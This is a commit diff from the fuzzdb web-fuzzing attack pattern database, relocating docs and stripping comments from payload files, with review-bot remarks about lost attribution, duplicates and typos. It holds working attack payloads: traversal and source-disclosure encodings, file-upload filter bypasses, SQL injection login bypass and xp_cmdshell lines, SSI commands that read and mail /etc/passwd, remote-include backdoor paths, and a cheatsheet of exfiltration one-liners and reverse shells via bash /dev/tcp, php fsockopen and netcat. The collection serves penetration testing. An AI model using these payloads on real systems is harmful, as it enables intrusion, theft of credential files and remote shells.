doc relocation and renaming update

Adam Muntner 2015-09-11 19:39:11 -04:00
parent b3e506dab1
commit a58bdb659d
1318 changed files with 323 additions and 182163 deletions

BIN
._readme.txt.kate-swp Normal file

Binary file not shown.
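Review bot: ._readme.txt.kate-swp is a Kate editor swap file, not project content; drop it from this commit and add an ignore rule for the .kate-swp suffix so a "doc relocation" commit does not ship editor state.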

4
.directory Normal file

@ -0,0 +1,4 @@
[Dolphin]
Timestamp=2015,9,11,16,15,10
Version=3
ViewMode=1
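Review bot: .directory is KDE Dolphin view metadata (Timestamp, ViewMode) and should not be in the repository. The same applies to attack/.directory and the other [Dolphin] files added further down in this commit; remove them and ignore `.directory` globally so they do not keep reappearing in later commits.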


@ -1,4 +1,4 @@
Copyright (c) 2010-2013, Adam Muntner
Copyright (c) 2010-2015, Adam Muntner
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:


@ -1,61 +0,0 @@
fuzzdb: Web Fuzzing Discovery and Attack Pattern Database
****Introduction
Too much new software is vulnerable to the attack sequences of yesteryear. This suggests a testing approach: a comprehensive set of known attack pattern sequences can be leveraged for use in targeted fuzzing when testing for exploitable conditions in new applications.
This is especially useful for many filter bypass type exploits. Identical encoding sequences have been observed to bypass filters for more than one application. Examples can be observed in categories including xss, sqli, evil script upload, OS command execution, traversal issues, directory indexing bugs, source code revealing vulnerabilities, etc. In recent times, for example, new embedded webservers were discovered to be vulnerable to directory traversal issues triggered by encodings that exploited Microsoft IIS in 2000.
This approach is also useful for targeted use of brute force for discovery using, for example, lists of known vulnerable scripts sorted by platform type, default locations of critical files of popular apps, high quality lists of common directory names.
Primary sources used for attack pattern research:
-researching old web exploits for repeatable attack strings
-penetration tests i've performed in the past
-scraping scanner patterns from my own http logs
-various books, articles, blog posts
-documentation for popular applications
-analysis of default application installs
notable sources and other contributors:
-metasploit wmap http://www.metasploit.com/redmine/projects/framework/wiki/WMAP
-dirb http://www.open-labs.org/
-jbrofuzz http://www.owasp.org/index.php/Category:OWASP_JBroFuzz
-skipfish http://code.google.com/p/skipfish/
-rsnake's xss and rfi files http://ha.ckers.org/
-michael daw's web shell archive http://michaeldaw.org/
-joseph giron (joseph.giron13 (at) gmail.com)
-ron gutierrez - html tags and javascript events
-analysis of default app installs
-lists already submitted to OWASP Fuzzing Code DB by Wagner Elias, Eduardo Neves, Ulisses Castro, Adam Muntner http://www.owasp.org/index.php/Category:OWASP_Fuzzing_Code_Database#tab=News
Some files are derived primarily from other fuzzers, and are credited in the files with comments formatted like:
# This file is primarily derived from source xyz
Others have additional instructions for payload use in a similar comment format at the top of the file
****Download
Check out via svn:
svn checkout http://fuzzdb.googlecode.com/svn/trunk/ fuzzdb-read-only
Or, pick from a plethora of available svn clients: http://en.wikipedia.org/wiki/Comparison_of_Subversion_clients
Tarballs are available for download, but may not be as fresh as whats in the svn repo.
Browse the repo http://code.google.com/p/fuzzdb/source/browse/#svn/trunk
****Usage
I primarily use fuzzdb in the excellent OWASP ZAP (https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project) and in Burp Suite Pro (http://portswigger.net/suite/), however, it can be used in any web application/service fault injection tool, for manual testing as an interesting source of test cases for fuzzing binary applications, in IDS signatures, and more.
****Who
This SVN repository and the files were assembled by Adam Muntner who works as a Security Engineer at Mozilla Corp.
contact: unix23 (@) gmail.com
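Review bot: this deletes the only place where the source credits (metasploit wmap, dirb, jbrofuzz, skipfish, RSnake, Michael Daw, Joseph Giron, Ron Gutierrez, the OWASP Fuzzing Code DB contributors) and the "primarily derived from source xyz" comment convention are documented, and none of the README files added elsewhere in this commit carry them. Keep an attribution section in the relocated top-level doc. The stale svn/googlecode links can go, but with 182163 deletions against 323 additions in this commit it is worth confirming that every relocated doc actually landed rather than only the deletion.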


@ -1,8 +0,0 @@
# single directory traversals that have caused showcode or command exec issues in the past
# GET /path/*payload*relative/path/to/target/file/
..%255c
.%5c../..%5c
/..%c0%9v../
/..%c0%af../
/..%255c..%255c


@ -1,12 +0,0 @@
# known cross platform source Code, file disclosure attack patterns - append after file or dir path
%70
.%E2%73%70
%2e0
%2e
.
\
?*
%20
%00
%2f
%5c


@ -1,9 +0,0 @@
# {ASPSCRIPT}gets regex replaced with the shell or other file you are trying to upload, {EXT} should be brute-forced with payloads from discovery/filename-bruteforce/file-extensions/, since some file upload types may be allowed that are not listed.
{ASPSCRIPT}
{ASPSCRIPT}.{EXT}
{ASPSCRIPT};
{ASPSCRIPT};.{EXT}
{ASPSCRIPT}%00
{ASPSCRIPT}%00.{EXT}
{ASPSCRIPT}::data%00.
{ASPSCRIPT}::data%00.{EXT}


@ -1,11 +0,0 @@
# Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/ to create a .jpg image with the meta comment field set to:
# -----
#<?php phpinfo(); ?>
#-----
{PHPSCRIPT}
{PHPSCRIPT}.phtml
{PHPSCRIPT}.php.html
{PHPSCRIPT}.php::$DATA
{PHPSCRIPT}.php.php.rar
{PHPSCRIPT}.php.rar
{PHPSCRIPT}::$DATA


@ -1,9 +0,0 @@
# Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/ to create a .jpg image with the meta comment field set to:
# -----
# your own payload, or <?php phpinfo(); ?>
#-----
{PHPSCRIPT}
{PHPSCRIPT}.phtml
{PHPSCRIPT}.php.html
{PHPSCRIPT}.php.php.rar
{PHPSCRIPT}.php.rar


@ -1,32 +0,0 @@
# File Upload Fuzzfile 1.0 - File Name Filter Bypass
# creative commons license http://creativecommons.org/licenses/by/3.0/
# see:
# http://cwe.mitre.org/data/definitions/434.html
# projurl
# For MIME filter bypass, your shellscript should look like
# -------
# GIF89aP;
# [shell]
# -------
#
# Check to see if there are no extension checks at all
#
# Check to see if the file upload protection is client side only.
#
# For mod_cgi Server Side Include upload attacks:
#<!--#exec cmd="ls" -->
#
#or, on Windows
#
#<!--#exec cmd="dir" -->
#
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, if so,
# try setting .jpg to executable. If you can set the target directory, try fuzz the
# list of all dirs you've enumerated on the servers, and try the commonly writable directory fuzzfile.
#
# example .htaccess that sets mime type .jpg to be executable:
# -----
# AddType application/x-httpd-php .jpg
# -----
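Review bot: this header carries the file's license statement (creativecommons.org/licenses/by/3.0/) and the CWE-434 reference; the relocated file-upload notes README added later in this commit keeps the CWE link but drops the license line. Carry the license into the new README, otherwise the attribution requirement of CC-BY is lost with this deletion.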


@ -1,2 +0,0 @@
# Invalid filenames - these can be used to attempt to cause an error condition during file upload bypass attempts which might reveal an absolute path. Useful if you're not sure where your files are landing.


@ -1,14 +0,0 @@
# list of invalid characters for windows filesystem - these can be used to attempt to cause an error condition during file upload bypass attempts which might reveal an absolute path. Useful if you're not sure where your files are landing.
# fuzz these into a filename during upload attempts
*
.
"
/
\
[
]
:
;
|
=
,


@ -1,27 +0,0 @@
\boot.ini
\WINDOWS\win.ini
\WINNT\win.ini
\WINDOWS\Repair\SAM
\WINDOWS\php.ini
\WINDOWS\system32\drivers\etc\hosts
\WINNT\php.ini
\php\php.ini
\php5\php.ini
\php4\php.ini
\apache\php\php.ini
\xampp\apache\bin\php.ini
\home2\bin\stable\apache\php.ini
\home\bin\stable\apache\php.ini
\Program Files\Apache Group\Apache\logs\access.log
\Program Files\Apache Group\Apache\logs\error.log
\Program Files\Apache Group\Apache\conf\httpd.conf
\Program Files\Apache Group\Apache2\conf\httpd.conf
\Program Files\xampp\apache\conf\httpd.conf
\Program Files\FileZilla Server\FileZilla Server.xml
\Program Files (x86)\Apache Group\Apache\logs\access.log
\Program Files (x86)\Apache Group\Apache\logs\error.log
\Program Files (x86)\Apache Group\Apache\conf\httpd.conf
\Program Files (x86)\Apache Group\Apache2\conf\httpd.conf
\Program Files (x86)\xampp\apache\conf\httpd.conf
\Program Files (x86)\FileZilla Server\FileZilla Server.xml
\AppServ\MySQL\data\mysql\user.MYD
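Review bot: of these 27 Windows paths, only the six Apache log and conf entries reappear in the common-windows-httpd-log-locations file added below; boot.ini, win.ini, the SAM backup, the php.ini variants, the hosts file, the FileZilla Server.xml entries and the MySQL user.MYD do not appear in any file shown in this diff. If they were moved to a file hidden by the diff cutoff, fine; otherwise this is a content loss rather than a relocation and the commit message should say so.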


@ -1,3 +0,0 @@
other tools:
fimap http://code.google.com/p/fimap/


@ -1,4 +0,0 @@
# list of potentially useful dos commands to fuzz inside an os command execution bug
ver
chdir
echo %USERNAME%


@ -1,8 +0,0 @@
# single directory traversals that have caused showcode or command exec issues in the past
# GET /path/*payload*relative/path/to/target/file/
..%255c
.%5c../..%5c
/..%c0%9v../
/..%c0%af../
/..%255c..%255c


@ -1,3 +0,0 @@
Other tools:
fimap http://code.google.com/p/fimap/


@ -1,8 +0,0 @@
# regex replace as many as you can with your fuzzer for best results:
# <user-fieldname> <pass-fieldname> <username>
# also try to brute force a list of possible usernames, including possile admin acct names
<username>' OR 1=1--
'OR '' = ' Allows authentication without a valid username.
<username>'--
' union select 1, '<user-fieldname>', '<pass-fieldname>' 1--
'OR 1=1--
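Review bot: the `'OR '' = '` line has its explanation ("Allows authentication without a valid username.") appended on the same line, so a fuzzer will send that sentence as part of the payload. If this list is re-added under attack/ (the sqli README at the end of this commit references mysql-injection-login-bypass.fuzz.txt), move the sentence into that README alongside the other notes.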

5
attack/.directory Normal file

@ -0,0 +1,5 @@
[Dolphin]
HeaderColumnWidths=288,60,115
Timestamp=2015,9,11,16,20,26
Version=3
ViewMode=1


@ -0,0 +1,4 @@
[Dolphin]
Timestamp=2015,9,11,16,22,7
Version=3
ViewMode=1


@ -1,4 +1,3 @@
# based on list by Joseph Giron http://www.wtfchan.org/~evil1/Web-Shells-rev2.pdf
/apache/logs/error.log
/apache/logs/access.log
/apache/logs/error.log
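Review bot: removing the `# based on list by Joseph Giron` line drops this file's only attribution; the LFI README added below keeps the URL but not the author's name, so credit him there by name. The context lines also show /apache/logs/error.log both before and after /apache/logs/access.log, a duplicate entry that should be collapsed while the file is being touched. The same hunk appears a second time further down, so this list exists in two directories; keep one.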


@ -0,0 +1,13 @@
Notes:
source-disc-cmd-exec-traversal.txt
single directory traversals that have caused showcode or command exec issues in the past
GET /path/*payload*relative/path/to/target/file/
source-disclosure-generic.txt
known cross platform source Code, file disclosure attack patterns - append after file or dir path
source-disclosure-microsoft.txt
microsoft-specific - appends after filename - try the generic list for microsoft, too
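Review bot: the filenames in this Notes file (source-disc-cmd-exec-traversal.txt, source-disclosure-generic.txt, source-disclosure-microsoft.txt) lack the `.fuzz.txt` suffix that the other notes in this commit use for the same files (the remote command exec README says source-disc-cmd-exec-traversal.fuzz.txt), so a reader cannot match a note to its file. Use the actual filenames, and consider naming this file README.md as the other directories do.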


@ -0,0 +1,6 @@
..%255c
.%5c../..%5c
/..%c0%9v../
/..%c0%af../
/..%255c..%255c


@ -0,0 +1,11 @@
%70
.%E2%73%70
%2e0
%2e
.
\
?*
%20
%00
%2f
%5c


@ -20,4 +20,8 @@ jacco\ van"someting"tuijl\example@address.com
“email”@address.com
sql"or"1"="1"or"test@email.com
sql'or'1'='1'or'test@email.com
xss"><script>alert(1)</script><"test@address.com
xss"><script>alert(1)</script><"test@address.com
a"b(c)d,e:f;g<h>i[j\k]l@example.com
this is"not\allowed@example.com
notallowed@example.com
notallowed@example.com
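Review bot: two pairs of lines in this hunk are visually identical (the two `xss"><script>alert(1)</script><"test@address.com` entries and the two `notallowed@example.com` entries). If they are true duplicates, drop one of each; if they differ only in invisible characters (encoding, trailing whitespace), say so in a comment, otherwise the next cleanup pass will dedupe them and lose the intended test case.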


@ -0,0 +1,4 @@
[Dolphin]
Timestamp=2015,9,11,17,25,0
Version=3
ViewMode=1


@ -0,0 +1,74 @@
# File Upload Fuzzfiles- File Name Filter Bypass Notes
see: http://cwe.mitre.org/data/definitions/434.html
# kinds of file upload verifications:
# content-type
# filename extension verificationi (whitelist, blacklist)
# file content checking
# client side, ha ha ha
File notes:
alt-extensions-asp.fuzz.txt
alt-extensions-coldfusion.fuzz.txt
alt-extensions-jsp.fuzz.txt
alt-extensions-perl.fuzz.txt
alt-extensions-php.fuzz.txt
# Alternative ways of expressing file extensions that will be interpreted correctly by the target filesystem/app and can be used to bypass blacklist filters
file-ul-filter-bypass-commonly-writable-directories.fuzz.txt
# File directory names that experience has shown are often writable
file-ul-filter-bypass-microsoft-asp-filetype-bf.fuzz.txt
# {ASPSCRIPT}gets regex replaced with the shell or other file you are trying to upload, {EXT} should be brute-forced with payloads from discovery/filename-bruteforce/file-extensions/, since some file upload types may be allowed that are not listed.
file-ul-filter-bypass-microsoft-asp.fuzz.txt
# this file contains a number of common predictable values. Add more if other file types are allowed, or use the filetype-bf version of this fuzzfile - {ASPSCRIPT} gets regex replaced.
file-ul-filter-bypass-ms-php.fuzz.txt
file-ul-filter-bypass-x-platform-php.fuzz.txt
# php on microsoft, cross-platform. use both on ms.
# Use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/ to create a .jpg image with the meta comment field set to:
# -----
#<?php phpinfo(); ?>
#-----
# then regex replace {PHPSCRIPT} with the name of your .jpg file in the target directory
invalid-filenames-microsoft.fuzz.txt
# Useful for causing error messages that contain an absolute drivepath, such as if you don't know where the file uploader puts files
# regex replace {EXT} with allowed extension type
file-ul-filter-bypass-x-platform-generic.fuzz.txt
# These might bypass a file upload blacklist but be written in a way that leaves them executable because of the filetype
# regex replace {PHPSCRIPT} with your script name
invalid-filenames-linux.fuzz.txt
# invalid filenames under linux, and since there aren't too many of those, other filepaths that may cause problems. # these can be used to attempt to cause an error condition during file upload bypass attempts which might reveal an absolute path. Useful if you're not sure where your files are landing.
invalid-filesystem-chars-microsoft.fuzz.txt
# list of invalid characters for windows filesystem - these can be used to attempt to cause an error condition during file upload bypass attempts which might reveal an absolute path. Useful if you're not sure where your files are landing.
# fuzz these into a filename during upload attempts
## Addtl Tips:
# For mod_cgi Server Side Include upload attacks:
<!--#exec cmd="ls" -->
# or, on Windows
<!--#exec cmd="dir" -->
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, if so,
# try setting jpg mimetype handler to executable. If you can set the target directory, try to fuzz the
# list of all dirs you've enumerated on the servers, and try the commonly writable directory fuzzfile.
# example .htaccess entry that sets mime type .jpg to be executable:
-----
AddType application/x-httpd-php .jpg
-----
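Review bot: the header of the deleted file-upload notes carried a CC-BY 3.0 license line that this relocated README omits; add it back. Smaller points: `verificationi` and `Addtl` are typos, the `see:` line is the only uncommented line in the header block, and the invalid-filenames-linux note has a second `#` fused into the middle of the line, so two notes read as one run-on sentence.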


@ -0,0 +1,8 @@
{ASPSCRIPT}
{ASPSCRIPT}.{EXT}
{ASPSCRIPT};
{ASPSCRIPT};.{EXT}
{ASPSCRIPT}%00
{ASPSCRIPT}%00.{EXT}
{ASPSCRIPT}::data%00.
{ASPSCRIPT}::data%00.{EXT}


@ -1,4 +1,3 @@
# this file contains a number of common predictable values. Add more if other file ttypes are allowed, or use the filetype-bf version of this fuzzfile
{ASPSCRIPT}
{ASPSCRIPT};
{ASPSCRIPT};.jpg


@ -0,0 +1,7 @@
{PHPSCRIPT}
{PHPSCRIPT}.phtml
{PHPSCRIPT}.php.html
{PHPSCRIPT}.php::$DATA
{PHPSCRIPT}.php.php.rar
{PHPSCRIPT}.php.rar
{PHPSCRIPT}::$DATA


@ -0,0 +1,5 @@
{PHPSCRIPT}
{PHPSCRIPT}.phtml
{PHPSCRIPT}.php.html
{PHPSCRIPT}.php.php.rar
{PHPSCRIPT}.php.rar
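Review bot: the five entries of this cross-platform PHP list are repeated verbatim in the ms-php list above, which adds only the two `::$DATA` variants; since the upload README says to use both lists on Microsoft targets, each shared entry will be sent twice. Either make the ms-php file contain only the `::$DATA` entries or state in the README that the two lists overlap.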


@ -0,0 +1,7 @@
/
\0
/dev/null
/dev/null/foo
.
..
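Review bot: `\0` here is a literal backslash followed by a zero, and a fuzzer will send exactly those two characters unless it unescapes; the other fuzz files in this commit express a NUL as `%00`. Pick one convention and state it in the README, otherwise this entry tests something other than what was intended. The hunk header also announces seven lines for six entries, i.e. a trailing blank line that tools will send as an empty filename.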


@ -1,5 +1,3 @@
# Useful for causing error messages that contain an absolute drivepath, such as if you don't know where the file uploader puts files
# regex replace {EXT} with allowed extension type
CON.{EXT}
PRN.{EXT}
AUX.{EXT}


@ -0,0 +1,12 @@
*
.
"
/
\
[
]
:
;
|
=
,


@ -1,4 +1,3 @@
# derived from fuzz file by Foobar@email.de
%s%p%x%d
%p%p%p%p
%x%x%x%x
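Review bot: the removed `# derived from fuzz file by Foobar@email.de` line was this file's only attribution, and unlike the upload, LFI and RFI lists there is no README in this commit that restates it. If the `#` headers are being stripped so fuzzers stop sending them as payloads, this directory needs a notes file too.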


@ -1,4 +1,3 @@
# integer overflows from jbrofuzz
-1
0
0x100
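Review bot: same attribution loss as the format-string file above: `# integer overflows from jbrofuzz` disappears and no added README restates it.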

17
attack/lfi/README.md Normal file

@ -0,0 +1,17 @@
LFI - Local File Include attacks
To exploit an LFI bug, you need to be able to write code to a local file and call it from the include. HTTPD log files are a location that is typically writable.
common-unix-httpd-log-locations.fuzz.txt
# To exploit a lfi bug, you have to get code into a local file. This list contains a list of common unix logfile locations based on common packages formats.
common-windows-httpd-log-locations.fuzz.txt
# To exploit a lfi bug, you have to get code into a local file. This list contains a list of common windows logfile locations based on common packages formats.
For more details:
http://www.wtfchan.org/~evil1/Web-Shells-rev2.pdf
other tools:
fimap http://code.google.com/p/fimap/
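Review bot: the two per-file notes repeat the opening sentence almost verbatim ("To exploit a lfi bug, you have to get code into a local file"); say it once and keep the per-file lines to what differs between the unix and windows lists, and fix "common packages formats". The attribution comment removed from the unix log list below names Joseph Giron, so credit him by name next to the URL rather than leaving a bare link. This is a .md file but uses no markdown, so the `#` lines will render as top-level headings.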


@ -0,0 +1,6 @@
\Program Files\Apache Group\Apache\logs\access.log
\Program Files\Apache Group\Apache\logs\error.log
\Program Files\Apache Group\Apache\conf\httpd.conf
\Program Files\Apache Group\Apache2\conf\httpd.conf
\Program Files (x86)\Apache Group\Apache\logs\access.log
\Program Files (x86)\Apache Group\Apache\logs\error.log
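Review bot: the LFI README describes this file as a list of log locations, but two of its six entries are httpd.conf files, not logs; either rename the list or move the conf paths to a configuration-file list so the README note stays accurate.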


@ -1,4 +1,3 @@
# based on list by Joseph Giron http://www.wtfchan.org/~evil1/Web-Shells-rev2.pdf
/apache/logs/error.log
/apache/logs/access.log
/apache/logs/error.log
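Review bot: this hunk is identical to the one for the same unix log list earlier in this commit, so two copies of the file live in different directories; keep one and have both READMEs point to it. The duplicate /apache/logs/error.log entry and the dropped Joseph Giron attribution apply here as well.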


@ -0,0 +1,4 @@
[Dolphin]
Timestamp=2015,9,11,18,18,9
Version=3
ViewMode=1


@ -1,10 +1,63 @@
One-liner reverse shells...
Remote Command Exec Cheatsheet
File notes:
source-disc-cmd-exec-traversal.fuzz.txt
# single directory traversals that have caused showcode or command exec issues in the past
# GET /path/*payload*relative/path/to/target/file/
Executing Commands
Seperating Commands:
blah;blah2
PIPEZ:
blah ^ blah2
AND:
blah && blah2
OR:
FAIL || X
OR:
blah%0Dblah2%0Dblah3
Backtick:
`blah`
Background:
`blah & blah2`
Exfiltrating Files / Data
FTP:
Make a new text file, and echo and then redirect to FTP
NC:
nc -e /bin/sh
NC:
echo /etc/passwd | nc host port
TFTP:
echo put /etc/passwd | tftp host
WGET:
wget --post-file /etc/passwd
One-Liner Reverse Shells
On the listener:
$ nc -l -p 8080 -vvv
On the remote host...
Bash:
$ bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
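Review bot: `Seperating` is a typo, and the `File notes:` block about source-disc-cmd-exec-traversal.fuzz.txt is pasted into the middle of a command-execution cheatsheet rather than into the README of the directory that holds the fuzz file; move it next to the file it describes. The first line `One-liner reverse shells...` duplicates the later `One-Liner Reverse Shells` heading and can go.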
@ -25,7 +78,6 @@ $ php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
(Assumes TCP uses file descriptor 3. It it doesn't work, try 4,5, or 6)
Netcat:
$ nc -e /bin/sh 10.0.0.1 1234
$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
@ -39,3 +91,4 @@ $ xhost +targetip
More docs: /docs/attack-docs/remote-cmd-exfiltration/
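Review bot: `/docs/attack-docs/remote-cmd-exfiltration/` is referenced as a directory while the rfi README in this commit points at `/docs/attack-docs/rfi-cheatsheet.html`; since this commit relocates docs, confirm both paths still resolve after the move.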


@ -0,0 +1,6 @@
..%255c
.%5c../..%5c
/..%c0%9v../
/..%c0%af../
/..%255c..%255c
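Review bot: this is the second copy of the same five-line traversal list added in this commit (the same lines appear under the Notes file above), and the deleted originals were likewise two identical files. The relocation preserves the duplication; keep one copy and have both READMEs point to it. The hunk header also claims six lines for five entries, i.e. a trailing blank line that will be sent as an empty payload.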


@ -1,4 +1,3 @@
# list of potentially useful unix commands to fuzz inside an os command execution bug
uname -n -s
whoami
pwd


@ -0,0 +1,3 @@
ver
chdir
echo %USERNAME%
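Review bot: the descriptions stripped from this file and from the unix command list above (`# list of potentially useful ... commands to fuzz inside an os command execution bug`) are not restated in the remote command exec README, whose File notes cover only the traversal file; add an entry for each there so the purpose of the two lists survives the relocation.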


@ -0,0 +1,4 @@
traversals-8-deep-exotic-encoding.fuzz.txt
# Use Regex to replace {FILE} with your target filename


@ -1,6 +1,3 @@
# Derived from the awesome "Directory Traversal Fuzzing Code" v0.2 by Luca Carettoni
# Did some cleanup & removed anything to the right of {FILE} for inclusion in a
# separate fuzzfile for more flexibiity
/../{FILE}
/../../{FILE}
/../../../{FILE}
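Review bot: the removed header credits Luca Carettoni's "Directory Traversal Fuzzing Code" v0.2 and explains the {FILE} convention for this file; the traversal README added just above mentions only traversals-8-deep-exotic-encoding.fuzz.txt, so this file loses its attribution entirely. Add an entry for it with the credit.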

14
attack/rfi/README.md Normal file

@ -0,0 +1,14 @@
rfi.fuzz.txt
# Compiled by RSnake 02/01/2010 Mostly from milw0rm osvdb.org and elsewhere.
# Change XXpathXX to the path of your backdoor. Note that you may need to
# try it against every directory on the target and because of how this was
# culled you may need to add a question mark to your own XXpathXX URL:
# Eg: XXpathXX => http://www.example.com/hax.txt?
see:
/docs/attack-docs/rfi-cheatsheet.html
Other tools:
fimap http://code.google.com/p/fimap/


@ -1,8 +1,3 @@
# Compiled by RSnake 02/01/2010 Mostly from milw0rm osvdb.org and elsewhere.
# Change XXpathXX to the path of your backdoor. Note that you may need to
# try it against every directory on the target and because of how this was
# culled you may need to add a question mark to your own XXpathXX URL:
# Eg: XXpathXX => http://www.example.com/hax.txt?
/0_admin/modules/Wochenkarte/frontend/index.php?x_admindir=XXpathXX?
/123flashchat.php?e107path=XXpathXX
/2007/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=XXpathXX


@ -1,5 +1,4 @@
# includes work by Foobar@email.de
<!--#exec cmd="/bin/ls /" --><br/>
<!--#exec cmd="cat /etc/passwd" --><br/>
<!--#exec cmd="find / -name *.* -print" --><br/>
<!--#exec cmd="mail Foobar@email.de <mailto:Foobar@email.de> < cat /etc/passwd" --><br/>
<!--#exec cmd="mail email@dom.tld <mailto:email@dom.tld> < cat /etc/passwd" --><br/>
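Review bot: the `# includes work by Foobar@email.de` attribution is removed without a README restating it, and the mail payload's address is changed to email@dom.tld in the same hunk. If the goal is to scrub the contributor's address from payloads, keep the credit (by name, without the address) in a notes file for this directory.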


@ -1,4 +1,3 @@
# from wapiti
sleep(__TIME__)#
1 or sleep(__TIME__)#
" or sleep(__TIME__)#


@ -1,4 +1,3 @@
# you will need to customize/modify some of the vaules in the queries for best effect
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
'create user name identified by 'pass123' --
'create user name identified by pass123 temporary tablespace temp default tablespace users;


@ -1,4 +1,3 @@
# contains statements from jbrofuzz (13 April 2010)
'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' --
'; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' --
'; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' --


@ -1,4 +1,3 @@
# Contains statements from jbrofuzz (13 April 2010)
1
1 and user_name() = 'dbo'
\'; desc users; --


@ -0,0 +1,9 @@
MSSQL.fuzz.txt
# you will need to customize/modify some of the vaules in the queries for best effect
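Review bot: `vaules` is a typo carried over from the removed comment; also this README names only MSSQL.fuzz.txt although the neighbouring hunks strip the jbrofuzz credit lines from several other files in the same area, which should get entries here as well.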


@ -1,4 +1,3 @@
# contains statements from jbrofuzz
or 1=1
' or '1'='1
'||utl_http.request('httP://192.168.1.1/')||'


@ -1,5 +1,3 @@
# to attempt with ids/waf evasion try like
# /index.aspx?page=select 1&page=2,3 from table where id=1
<>"'%;)(&+
|
!


@ -0,0 +1,18 @@
various useful post-exploitation commands
ms-sql-enumeration.fuzz.txt
# ms-sqli info disclosure payload fuzzfile
# replace regex with your fuzzer for best results <attackerip> <sharename>
# run wireshark or tcpdump, look for incoming smb or icmp packets from victim
# might need to terminate payloads with ;--
mysql-injection-login-bypass.fuzz.txt
# regex replace as many as you can with your fuzzer for best results:
# <user-fieldname> <pass-fieldname> <username>
# also try to brute force a list of possible usernames, including possile admin acct names
mysql-read-local-files.fuzz.txt
# mysql local file disclosure through sqli
# fuzz interesting absolute filepath/filename into <filepath>
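Review bot: the credits removed in the hunks above (`# contains statements from jbrofuzz` in three files, `# from wapiti`) and the removed ids/waf evasion note do not reappear in this README, which covers only three files, and the opening line `various useful post-exploitation commands` does not describe a SQL injection notes file. `possile` is a typo. Add one line per touched fuzz file with its source credit so the relocation does not silently drop attribution.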

Some files were not shown because too many files have changed in this diff.